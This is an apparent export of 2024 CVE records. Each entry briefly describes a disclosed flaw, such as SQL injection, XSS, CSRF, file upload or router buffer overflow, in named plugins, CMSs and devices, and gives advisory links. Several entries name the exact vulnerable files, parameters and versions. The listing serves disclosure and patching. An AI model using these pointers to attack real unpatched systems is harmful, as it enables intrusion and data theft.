CVE    2024    25915    Candidate    Server-Side Request Forgery (SSRF) vulnerability in Raaj Trambadia Pexels: Free Stock Photos. This issue affects Pexels: Free Stock Photos: from n/a through 1.2.2.    MISC:https://patchstack.com/database/vulnerability/wp-pexels-free-stock-photos/wordpress-pexels-free-stock-photos-plugin-1-2-2-server-side-request-forgery-ssrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-pexels-free-stock-photos/wordpress-pexels-free-stock-photos-plugin-1-2-2-server-side-request-forgery-ssrf-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25914    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Photoboxone SMTP Mail. This issue affects SMTP Mail: from n/a through 1.3.20.    MISC:https://patchstack.com/database/vulnerability/smtp-mail/wordpress-smtp-mail-plugin-1-3-20-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/smtp-mail/wordpress-smtp-mail-plugin-1-3-20-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25913    Candidate    Unrestricted Upload of File with Dangerous Type vulnerability in Skymoonlabs MoveTo. This issue affects MoveTo: from n/a through 6.2.    MISC:https://patchstack.com/database/vulnerability/moveto/wordpress-moveto-plugin-6-2-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/moveto/wordpress-moveto-plugin-6-2-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25912    Candidate    Missing Authorization vulnerability in Skymoonlabs MoveTo. This issue affects MoveTo: from n/a through 6.2.    MISC:https://patchstack.com/database/vulnerability/moveto/wordpress-moveto-plugin-6-2-unauthenticated-arbitrary-wordpress-settings-change-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/moveto/wordpress-moveto-plugin-6-2-unauthenticated-arbitrary-wordpress-settings-change-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25910    Candidate    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Skymoonlabs MoveTo. This issue affects MoveTo: from n/a through 6.2.    MISC:https://patchstack.com/database/vulnerability/moveto/wordpress-moveto-plugin-6-2-unauthenticated-sql-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/moveto/wordpress-moveto-plugin-6-2-unauthenticated-sql-injection-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    2591    Candidate    Vulnerability in AMSS++ version 4.31 that allows SQL injection through /amssplus/modules/book/main/bookdetail_group.php, in multiple parameters. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the server and retrieve all the information stored in the DB.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss    Assigned (20240318)
CVE    2024    25909    Candidate    Unrestricted Upload of File with Dangerous Type vulnerability in JoomUnited WP Media folder. This issue affects WP Media folder: from n/a through 5.7.2.    MISC:https://patchstack.com/database/vulnerability/wp-media-folder/wordpress-wp-media-folder-plugin-5-7-2-subscriber-arbitrary-file-upload-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-media-folder/wordpress-wp-media-folder-plugin-5-7-2-subscriber-arbitrary-file-upload-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25908    Candidate    Missing Authorization vulnerability in JoomUnited WP Media folder. This issue affects WP Media folder: from n/a through 5.7.2.    MISC:https://patchstack.com/database/vulnerability/wp-media-folder/wordpress-wp-media-folder-plugin-5-7-2-subscriber-arbitrary-post-page-modification-title-excerpt-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-media-folder/wordpress-wp-media-folder-plugin-5-7-2-subscriber-arbitrary-post-page-modification-title-excerpt-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25905    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Mondula GmbH Multi Step Form. This issue affects Multi Step Form: from n/a through 1.7.18.    MISC:https://patchstack.com/database/vulnerability/multi-step-form/wordpress-multi-step-form-plugin-1-7-17-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/multi-step-form/wordpress-multi-step-form-plugin-1-7-17-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25904    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in David Stockl TinyMCE and TinyMCE Advanced Professsional Formats and Styles. This issue affects TinyMCE and TinyMCE Advanced Professsional Formats and Styles: from n/a through 1.1.2.    MISC:https://patchstack.com/database/vulnerability/tinymce-and-tinymce-advanced-professsional-formats-and-styles/wordpress-tinymce-and-tinymce-advanced-professsional-formats-and-styles-plugin-1-1-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/tinymce-and-tinymce-advanced-professsional-formats-and-styles/wordpress-tinymce-and-tinymce-advanced-professsional-formats-and-styles-plugin-1-1-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25903    Candidate    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in N-Media Frontend File Manager. This issue affects Frontend File Manager: from n/a through 22.7.    MISC:https://patchstack.com/database/vulnerability/nmedia-user-file-uploader/wordpress-frontend-file-manager-plugin-plugin-22-7-sensitive-data-exposure-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/nmedia-user-file-uploader/wordpress-frontend-file-manager-plugin-plugin-22-7-sensitive-data-exposure-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    25902    Candidate    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in miniorange Malware Scanner. This issue affects Malware Scanner: from n/a through 4.7.2.    MISC:https://patchstack.com/database/vulnerability/miniorange-malware-protection/wordpress-malware-scanner-plugin-4-7-2-admin-sql-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/miniorange-malware-protection/wordpress-malware-scanner-plugin-4-7-2-admin-sql-injection-vulnerability?_s_id=cve    Assigned (20240212)
CVE    2024    2590    Candidate    Vulnerability in AMSS++ version 4.31 that allows SQL injection through /amssplus/modules/mail/main/select_send.php, in the 'sd_index' parameter. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the server and retrieve all the information stored in the DB.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss    Assigned (20240318)
CVE    2024    25898    Candidate    A XSS vulnerability was found in the ChurchCRM v.5.5.0 functionality, edit your event, where malicious JS or HTML code can be inserted in the Event Sermon field in EventEditor.php.    MISC:https://github.com/ChurchCRM/CRM/issues/6851    Assigned (20240212)
CVE    2024    25897    Candidate    ChurchCRM 5.5.0 FRCatalog.php is vulnerable to Blind SQL Injection (Time-based) via the CurrentFundraiser GET parameter.    MISC:https://github.com/ChurchCRM/CRM/issues/6856    Assigned (20240212)
CVE    2024    25896    Candidate    ChurchCRM 5.5.0 EventEditor.php is vulnerable to Blind SQL Injection (Time-based) via the EID POST parameter.    MISC:https://github.com/ChurchCRM/CRM/issues/6854    Assigned (20240212)
CVE    2024    25895    Candidate    A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 5.5.0 allows remote attackers to inject arbitrary web script or HTML via the type parameter of /EventAttendance.php.    MISC:https://github.com/ChurchCRM/CRM/issues/6853    Assigned (20240212)
CVE    2024    25894    Candidate    ChurchCRM 5.5.0 /EventEditor.php is vulnerable to Blind SQL Injection (Time-based) via the EventCount POST parameter.    MISC:https://github.com/ChurchCRM/CRM/issues/6849    Assigned (20240212)
CVE    2024    25893    Candidate    ChurchCRM 5.5.0 FRCertificates.php is vulnerable to Blind SQL Injection (Time-based) via the CurrentFundraiser GET parameter.    MISC:https://github.com/ChurchCRM/CRM/issues/6856    Assigned (20240212)
CVE    2024    25892    Candidate    ChurchCRM 5.5.0 ConfirmReport.php is vulnerable to Blind SQL Injection (Time-based) via the familyId GET parameter.    MISC:https://github.com/ChurchCRM/CRM/issues/6858    Assigned (20240212)
CVE    2024    25891    Candidate    ChurchCRM 5.5.0 FRBidSheets.php is vulnerable to Blind SQL Injection (Time-based) via the CurrentFundraiser GET parameter.    MISC:https://github.com/ChurchCRM/CRM/issues/6856    Assigned (20240212)
CVE    2024    2589    Candidate    Vulnerability in AMSS++ version 4.31 that allows SQL injection through /amssplus/modules/book/main/bookdetail_school_person.php, in multiple parameters. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the server and retrieve all the information stored in the DB.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss    Assigned (20240318)
CVE    2024    2588    Candidate    Vulnerability in AMSS++ version 4.31 that allows SQL injection through /amssplus/admin/index.php, in the 'id' parameter. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the server and retrieve all the information stored in the DB.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss    Assigned (20240318)
CVE    2024    25876    Candidate    A cross-site scripting (XSS) vulnerability in the Header module of Enhavo CMS v0.13.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title text field.    MISC:https://github.com/dd3x3r/enhavo/blob/main/xss-page-content-header-titel-v0.13.1.md   |   MISC:https://www.enhavo.com/    Assigned (20240212)
CVE    2024    25875    Candidate    A cross-site scripting (XSS) vulnerability in the Header module of Enhavo CMS v0.13.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Undertitle text field.    MISC:https://github.com/dd3x3r/enhavo/blob/main/xss-page-content-header-undertitel-v0.13.1.md   |   MISC:https://www.enhavo.com/    Assigned (20240212)
CVE    2024    25874    Candidate    A cross-site scripting (XSS) vulnerability in the New/Edit Article module of Enhavo CMS v0.13.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Create Tag text field.    MISC:https://github.com/dd3x3r/enhavo/blob/main/xss-create-tag-v0.13.1.md   |   MISC:https://www.enhavo.com/    Assigned (20240212)
CVE    2024    25873    Candidate    Enhavo v0.13.1 was discovered to contain an HTML injection vulnerability in the Author text field under the Blockquote module. This vulnerability allows attackers to execute arbitrary code via a crafted payload.    MISC:https://github.com/dd3x3r/enhavo/blob/main/html-injection-page-content-blockquote-author-v0.13.1.md   |   MISC:https://www.enhavo.com/    Assigned (20240212)
CVE    2024    2587    Candidate    Vulnerability in AMSS++ version 4.31 that allows SQL injection through /amssplus/modules/book/main/bookdetail_khet_person.php, in multiple parameters. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the server and retrieve all the information stored in the DB.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss    Assigned (20240318)
CVE    2024    25869    Candidate    An Unrestricted File Upload vulnerability in CodeAstro Membership Management System in PHP v.1.0 allows a remote attacker to execute arbitrary code via upload of a crafted php file in the settings.php component.    MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/MembershipManagementSystem-Unrestricted_Fileupload.md    Assigned (20240212)
CVE    2024    25868    Candidate    A Cross Site Scripting (XSS) vulnerability in CodeAstro Membership Management System in PHP v.1.0 allows a remote attacker to execute arbitrary code via the membershipType parameter in the add_type.php component.    MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/MembershipManagementSystem-Stored_XSS_Add_Type.md    Assigned (20240212)
CVE    2024    25867    Candidate    A SQL Injection vulnerability in CodeAstro Membership Management System in PHP v.1.0 allows a remote attacker to execute arbitrary SQL commands via the membershipType and membershipAmount parameters in the add_type.php component.    MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/MembershipManagementSystem-SQL_Injection_Add_Type.md    Assigned (20240212)
CVE    2024    25866    Candidate    A SQL Injection vulnerability in CodeAstro Membership Management System in PHP v.1.0 allows a remote attacker to execute arbitrary SQL commands via the email parameter in the index.php component.    MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/MembershipManagementSystem-SQL_Injection_Login.md    Assigned (20240212)
CVE    2024    25865    Candidate    Cross Site Scripting (XSS) vulnerability in hexo-theme-anzhiyu v1.6.12, allows remote attackers to execute arbitrary code via the algolia search function.    MISC:https://github.com/anzhiyu-c/hexo-theme-anzhiyu/issues/200    Assigned (20240212)
CVE    2024    2586    Candidate    Vulnerability in AMSS++ version 4.31 that allows SQL injection through /amssplus/index.php, in the 'username' parameter. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the server and retrieve all the information stored in the DB.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss    Assigned (20240318)
CVE    2024    25859    Candidate    A path traversal vulnerability in the /path/to/uploads/ directory of Blesta before v5.9.2 allows attackers to take over user accounts and execute arbitrary code.    MISC:https://www.blesta.com/2024/02/08/security-advisory/    Assigned (20240212)
CVE    2024    25858    Candidate    In Foxit PDF Reader before 2024.1 and PDF Editor before 2024.1, code execution via JavaScript could occur because of an unoptimized prompt message for users to review parameters of commands.    CONFIRM:https://www.foxit.com/support/security-bulletins.html    Assigned (20240212)
CVE    2024    25854    Candidate    Cross Site Scripting (XSS) vulnerability in Sourcecodester Insurance Management System 1.0 allows attackers to run arbitrary code via the Subject and Description fields when submitting a support ticket.    MISC:https://github.com/hakkitoklu/hunt/blob/main/Insurance%20Management%20System%20PHP%20and%20MySQL%201.0/xss.md    Assigned (20240212)
CVE    2024    25851    Candidate    Netis WF2780 v2.1.40144 was discovered to contain a command injection vulnerability via the config_sequence parameter in other_para of cgitest.cgi.    MISC:https://github.com/no1rr/Vulnerability/blob/master/netis/other_para_config_sequence.md   |   MISC:https://www.netis-systems.com/    Assigned (20240212)
CVE    2024    25850    Candidate    Netis WF2780 v2.1.40144 was discovered to contain a command injection vulnerability via the wps_ap_ssid5g parameter.    MISC:https://github.com/no1rr/Vulnerability/blob/master/netis/igd_wps_set_wps_ap_ssid5g.md   |   MISC:https://www.netis-systems.com/    Assigned (20240212)
CVE    2024    2585    Candidate    Vulnerability in AMSS++ version 4.31 that allows SQL injection through /amssplus/modules/book/main/select_send_2.php, in the 'sd_index' parameter. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the server and retrieve all the information stored in the DB.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss    Assigned (20240318)
CVE    2024    25849    Candidate    In the module "Make an offer" (makeanoffer) <= 1.7.1 from PrestaToolKit for PrestaShop, a guest can perform SQL injection via `MakeOffers::checkUserExistingOffer()` and `MakeOffers::addUserOffer()`.    MISC:https://addons.prestashop.com/en/price-management/19507-make-an-offer.html   |   MISC:https://security.friendsofpresta.org/modules/2024/03/05/makeanoffer.html    Assigned (20240212)
CVE    2024    25848    Candidate    In the module "Ever Ultimate SEO" (everpsseo) <= 8.1.2 from Team Ever for PrestaShop, a guest can perform SQL injection in affected versions.    MISC:https://addons.prestashop.com/fr/seo-referencement-naturel/39489-ever-ultimate-seo.html   |   MISC:https://security.friendsofpresta.org/modules/2024/03/05/everpsseo.html   |   MISC:https://www.team-ever.com/prestashop-ever-ultimate-seo/    Assigned (20240212)
CVE    2024    25847    Candidate    SQL Injection vulnerability in MyPrestaModules "Product Catalog (CSV, Excel) Import" (simpleimportproduct) modules for PrestaShop versions 6.5.0 and before, allows attackers to escalate privileges and obtain sensitive information via Send::__construct() and importProducts::_addDataToDb methods.    MISC:https://github.com/friends-of-presta/security-advisories/blob/main/_posts/2024-02-29-simpleimportproduct.md    Assigned (20240212)
CVE    2024    25846    Candidate    In the module "Product Catalog (CSV, Excel) Import" (simpleimportproduct) <= 6.7.0 from MyPrestaModules for PrestaShop, a guest can upload files with extensions .php.    MISC:https://addons.prestashop.com/fr/import-export-de-donnees/19091-catalogue-de-produits-csv-excel-dimportation.html   |   MISC:https://security.friendsofpresta.org/modules/2024/02/27/simpleimportproduct.html    Assigned (20240212)
CVE    2024    25845    Candidate    In the module "CD Custom Fields 4 Orders" (cdcustomfields4orders) <= 1.0.0 from Cleanpresta.com for PrestaShop, a guest can perform SQL injection in affected versions.    MISC:https://security.friendsofpresta.org/modules/2024/03/05/cdcustomfields4orders.html   |   MISC:https://www.cleanpresta.com    Assigned (20240212)
CVE    2024    25844    Candidate    An issue was discovered in Common-Services "So Flexibilite" (soflexibilite) module for PrestaShop before version 4.1.26, allows remote attackers to escalate privileges and obtain sensitive information via debug file.    MISC:https://github.com/friends-of-presta/security-advisories/blob/main/_posts/2024-02-29-soflexibilite.md    Assigned (20240212)
CVE    2024    25843    Candidate    In the module "Import/Update Bulk Product from any Csv/Excel File Pro" (ba_importer) up to version 1.1.28 from Buy Addons for PrestaShop, a guest can perform SQL injection in affected versions.    MISC:https://addons.prestashop.com/en/data-import-export/20579-import-update-bulk-product-from-any-csv-excel-file-pro.html   |   MISC:https://security.friendsofpresta.org/modules/2024/02/27/ba_importer.html    Assigned (20240212)
CVE    2024    25842    Candidate    An issue was discovered in Presta World "Account Manager - Sales Representative & Dealers - CRM" (prestasalesmanager) module for PrestaShop before version 9.0, allows remote attackers to escalate privilege and obtain sensitive information via the uploadLogo() and postProcess methods.    MISC:https://github.com/friends-of-presta/security-advisories/blob/main/_posts/2024-02-29-prestasalesmanager.md    Assigned (20240212)
CVE    2024    25841    Candidate    In the module "So Flexibilite" (soflexibilite) from Common-Services for PrestaShop < 4.1.26, a guest (authenticated customer) can perform Cross Site Scripting (XSS) injection.    MISC:https://addons.prestashop.com/fr/transporteurs/2704-colissimo-domicile-et-points-de-retrait.html   |   MISC:https://security.friendsofpresta.org/modules/2024/02/27/soflexibilite.html    Assigned (20240212)
CVE    2024    25840    Candidate    In the module "Account Manager | Sales Representative & Dealers | CRM" (prestasalesmanager) up to 9.0 from Presta World for PrestaShop, a guest can download personal information without restriction by performing a path traversal attack.    MISC:https://addons.prestashop.com/en/third-party-data-integrations-crm-erp/90816-account-manager-sales-representative-dealers-crm.html   |   MISC:https://security.friendsofpresta.org/modules/2024/02/27/prestasalesmanager.html    Assigned (20240212)
CVE    2024    2584    Candidate    Vulnerability in AMSS++ version 4.31 that allows SQL injection through /amssplus/modules/book/main/select_send.php, in the 'sd_index' parameter. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the server and retrieve all the information stored in the DB.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss    Assigned (20240318)
CVE    2024    25839    Candidate    An issue was discovered in Webbax "Super Newsletter" (supernewsletter) module for PrestaShop versions 1.4.21 and before, allows local attackers to escalate privileges and obtain sensitive information.    MISC:https://github.com/friends-of-presta/security-advisories/blob/main/_posts/2024-02-29-supernewsletter.md    Assigned (20240212)
CVE    2024    25833    Candidate    F-logic DataCube3 v1.0 is vulnerable to unauthenticated SQL injection, which could allow an unauthenticated malicious actor to execute arbitrary SQL queries in database.    MISC:https://neroteam.com/blog/f-logic-datacube3-vulnerability-report    Assigned (20240212)
CVE    2024    25832    Candidate    F-logic DataCube3 v1.0 is vulnerable to unrestricted file upload, which could allow an authenticated malicious actor to upload a file of dangerous type by manipulating the filename extension.    MISC:https://neroteam.com/blog/f-logic-datacube3-vulnerability-report    Assigned (20240212)
CVE    2024    25831    Candidate    F-logic DataCube3 Version 1.0 is affected by a reflected cross-site scripting (XSS) vulnerability due to improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface.    MISC:https://neroteam.com/blog/f-logic-datacube3-vulnerability-report    Assigned (20240212)
CVE    2024    25830    Candidate    F-logic DataCube3 v1.0 is vulnerable to Incorrect Access Control due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains the path of the configuration file. A successful exploit could allow the attacker to extract the root and admin password.    MISC:https://neroteam.com/blog/f-logic-datacube3-vulnerability-report    Assigned (20240212)
CVE    2024    25828    Candidate    cmseasy V7.7.7.9 has an arbitrary file deletion vulnerability in lib/admin/template_admin.php.    MISC:https://github.com/sec-Kode/cve    Assigned (20240212)
CVE    2024    25817    Candidate    Buffer Overflow vulnerability in eza before version 0.18.2, allows local attackers to execute arbitrary code via the .git/HEAD, .git/refs, and .git/objects components.    MISC:https://github.com/advisories/GHSA-3qx3-6hxr-j2ch   |   MISC:https://www.cubeyond.net/blog/my-cves/eza-cve-report    Assigned (20240212)
CVE    2024    25811    Candidate    An access control issue in Dreamer CMS v4.0.1 allows attackers to download backup files and leak sensitive information.    MISC:https://github.com/Fei123-design/vuln/blob/master/Dreamer%20CMS%20Unauthorized%20access%20vulnerability.md    Assigned (20240212)
CVE    2024    2581    Candidate    A vulnerability was found in Tenda AC10 16.03.10.13 and classified as critical. This issue affects the function fromSetRouteStatic of the file /goform/SetStaticRouteCfg. The manipulation of the argument list leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257081 was assigned to this vulnerability.    MISC:VDB-257081 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257081   |   MISC:VDB-257081 | Tenda AC10 SetStaticRouteCfg fromSetRouteStatic stack-based overflow   |   URL:https://vuldb.com/?id.257081   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10/V16.03.10.13/fromSetRouteStatic.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10/V16.03.10.13/fromSetRouteStatic.md    Assigned (20240317)
CVE    2024    25808    Candidate    Cross-site Request Forgery (CSRF) vulnerability in Lychee version 3.1.6, allows remote attackers to execute arbitrary code via the create new album function.    MISC:https://github.com/Hebing123/cve/issues/17    Assigned (20240212)
CVE    2024    25807    Candidate    Cross Site Scripting (XSS) vulnerability in Lychee 3.1.6, allows remote attackers to execute arbitrary code and obtain sensitive information via the title parameter when creating an album.    MISC:https://github.com/Hebing123/cve/issues/17    Assigned (20240212)
CVE    2024    25802    Candidate    SKINsoft S-Museum 7.02.3 allows Unrestricted File Upload via the Add Media function. Unlike in CVE-2024-25801, the attack payload is the file content.    MISC:https://shrouded-trowel-50c.notion.site/S-Museum-Version-7-02-3-Unrestricted-File-Upload-b73d4590b024449787464ddcc175b8f7?pvs=4    Assigned (20240212)
CVE    2024    25801    Candidate    SKINsoft S-Museum 7.02.3 allows XSS via the filename of an uploaded file. Unlike in CVE-2024-25802, the attack payload is in the name (not the content) of a file.    MISC:https://shrouded-trowel-50c.notion.site/S-Museum-Version-7-02-3-Stored-Cross-Site-Scripting-69ca7b8805cc448ea12cb8f7ed571fa3?pvs=4    Assigned (20240212)
CVE    2024    2580    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FunnelKit Automation By Autonami allows Stored XSS. This issue affects Automation By Autonami: from n/a through 2.8.2.    MISC:https://patchstack.com/database/vulnerability/wp-marketing-automations/wordpress-recover-woocommerce-cart-abandonment-newsletter-email-marketing-marketing-automation-by-funnelkit-plugin-2-8-2-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-marketing-automations/wordpress-recover-woocommerce-cart-abandonment-newsletter-email-marketing-marketing-automation-by-funnelkit-plugin-2-8-2-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240317)
CVE    2024    2579    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Data443 Tracking Code Manager. This issue affects Tracking Code Manager: from n/a through 2.0.16.    MISC:https://patchstack.com/database/vulnerability/tracking-code-manager/wordpress-tracking-code-manager-plugin-2-0-16-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/tracking-code-manager/wordpress-tracking-code-manager-plugin-2-0-16-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240317)
CVE    2024    2578    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPCoder WP Coder allows Stored XSS. This issue affects WP Coder: from n/a through 3.5.    MISC:https://patchstack.com/database/vulnerability/wp-coder/wordpress-wp-coder-plugin-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-coder/wordpress-wp-coder-plugin-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240317)
CVE    2024    25770    Candidate    libming 0.4.8 contains a memory leak vulnerability in /libming/src/actioncompiler/listaction.c.    MISC:https://github.com/LuMingYinDetect/libming_defects/blob/main/libming_detect_1.md    Assigned (20240212)
CVE    2024    2577    Candidate    A vulnerability has been found in SourceCodester Employee Task Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /update-employee.php. The manipulation of the argument admin_id leads to authorization bypass. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257080.    MISC:VDB-257080 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257080   |   MISC:VDB-257080 | SourceCodester Employee Task Management System update-employee.php authorization   |   URL:https://vuldb.com/?id.257080   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/IDOR%20-%20update-employee.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/IDOR%20-%20update-employee.php.md    Assigned (20240317)
CVE    2024    25768    Candidate    OpenDMARC 1.4.2 contains a null pointer dereference vulnerability in /OpenDMARC/libopendmarc/opendmarc_policy.c.    MISC:https://github.com/LuMingYinDetect/OpenDMARC_defects/blob/main/OpenDMARC_detect_1.md    Assigned (20240212)
CVE    2024    25767    Candidate    nanomq 0.21.2 contains a Use-After-Free vulnerability in /nanomq/nng/src/core/socket.c.    MISC:https://github.com/LuMingYinDetect/nanomq_defects/blob/main/nanomq_detect_1.md    Assigned (20240212)
CVE    2024    25763    Candidate    openNDS 10.2.0 is vulnerable to Use-After-Free via /openNDS/src/auth.c.    MISC:https://github.com/LuMingYinDetect/openNDS_defects/blob/main/openNDS_detect_1.md    Assigned (20240212)
CVE    2024    2576    Candidate    A vulnerability, which was classified as critical, was found in SourceCodester Employee Task Management System 1.0. This affects an unknown part of the file /update-admin.php. The manipulation of the argument admin_id leads to authorization bypass. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257079.    MISC:VDB-257079 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257079   |   MISC:VDB-257079 | SourceCodester Employee Task Management System update-admin.php authorization   |   URL:https://vuldb.com/?id.257079   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/IDOR%20-%20update-admin.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/IDOR%20-%20update-admin.php.md    Assigned (20240317)
CVE    2024    25756    Candidate    A Stack Based Buffer Overflow vulnerability in Tenda AC9 v.3.0 with firmware version v.15.03.06.42_multi allows a remote attacker to execute arbitrary code via the formWifiBasicSet function.    MISC:https://github.com/TimeSeg/IOT_CVE/blob/main/tenda/AC9V3/0218/formWifiBasicSet.md    Assigned (20240212)
CVE    2024    25753    Candidate    Stack Based Buffer Overflow vulnerability in Tenda AC9 v.3.0 with firmware version v.15.03.06.42_multi allows a remote attacker to execute arbitrary code via the formSetDeviceName function.    MISC:https://github.com/TimeSeg/IOT_CVE/blob/main/tenda/AC9V3/0218/formSetDeviceName.md    Assigned (20240212)
CVE    2024    25751    Candidate    A Stack Based Buffer Overflow vulnerability in Tenda AC9 v.3.0 with firmware version v.15.03.06.42_multi allows a remote attacker to execute arbitrary code via the fromSetSysTime function.    MISC:https://github.com/TimeSeg/IOT_CVE/blob/main/tenda/AC9V3/0218/fromSetSysTime.md    Assigned (20240212)
CVE    2024    2575    Candidate    A vulnerability, which was classified as critical, has been found in SourceCodester Employee Task Management System 1.0. Affected by this issue is some unknown functionality of the file /task-details.php. The manipulation of the argument task_id leads to authorization bypass. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257078 is the identifier assigned to this vulnerability.    MISC:VDB-257078 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257078   |   MISC:VDB-257078 | SourceCodester Employee Task Management System task-details.php authorization   |   URL:https://vuldb.com/?id.257078   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/IDOR%20-%20task-details.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/IDOR%20-%20task-details.php.md    Assigned (20240317)
